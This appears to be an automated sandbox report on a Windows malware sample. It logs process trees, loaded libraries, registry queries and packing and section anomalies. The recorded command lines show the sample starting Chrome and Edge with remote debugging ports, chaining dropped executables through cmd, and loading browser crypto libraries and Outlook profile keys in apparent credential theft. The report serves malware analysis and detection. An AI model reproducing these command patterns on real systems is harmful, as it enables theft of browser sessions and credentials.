Source: DocumentsDBKKKEHDHC.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: B@-aDDX

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16016120249375417697,2229644558360442611,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2264,i,13353248291220899786,2148692624632142094,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2740 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6440 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6604 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDBKKKEHDHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDBKKKEHDHC.exe "C:\Users\user\DocumentsDBKKKEHDHC.exe"
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6028 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDBKKKEHDHC.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2204,i,16016120249375417697,2229644558360442611,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2264,i,13353248291220899786,2148692624632142094,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2740 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6440 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6440 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6604 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6900 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6028 --field-trial-handle=2068,i,10168677201670927820,4631142609524840128,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDBKKKEHDHC.exe "C:\Users\user\DocumentsDBKKKEHDHC.exe"
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1795584 > 1048576

Source: file.exe

Static PE information: Raw size of dpgvilua is bigger than: 0x100000 < 0x19c800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: Re.PDB source: 2cc80dabc69f58b6_1.8.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpgvilua:EW;wsdjkgyh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpgvilua:EW;wsdjkgyh:EW;.taggant:EW;
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Unpacked PE file: 27.2.DocumentsDBKKKEHDHC.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmgocjct:EW;whbetzff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmgocjct:EW;whbetzff:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 28.2.skotes.exe.a60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmgocjct:EW;whbetzff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmgocjct:EW;whbetzff:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: cc0a932c85.exe.32.dr	Static PE information: real checksum: 0x42f8da should be: 0x1f5435
Source: random[1].exe.32.dr	Static PE information: real checksum: 0x42f8da should be: 0x1f5435
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: real checksum: 0x1e3784 should be: 0x1e5236
Source: file.exe	Static PE information: real checksum: 0x1c09de should be: 0x1b8f2f
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1e3784 should be: 0x1e5236
Source: skotes.exe.27.dr	Static PE information: real checksum: 0x1e3784 should be: 0x1e5236

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: dpgvilua
Source: file.exe	Static PE information: section name: wsdjkgyh
Source: file.exe	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: zmgocjct
Source: random[1].exe.0.dr	Static PE information: section name: whbetzff
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name:
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name:
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: zmgocjct
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: whbetzff
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
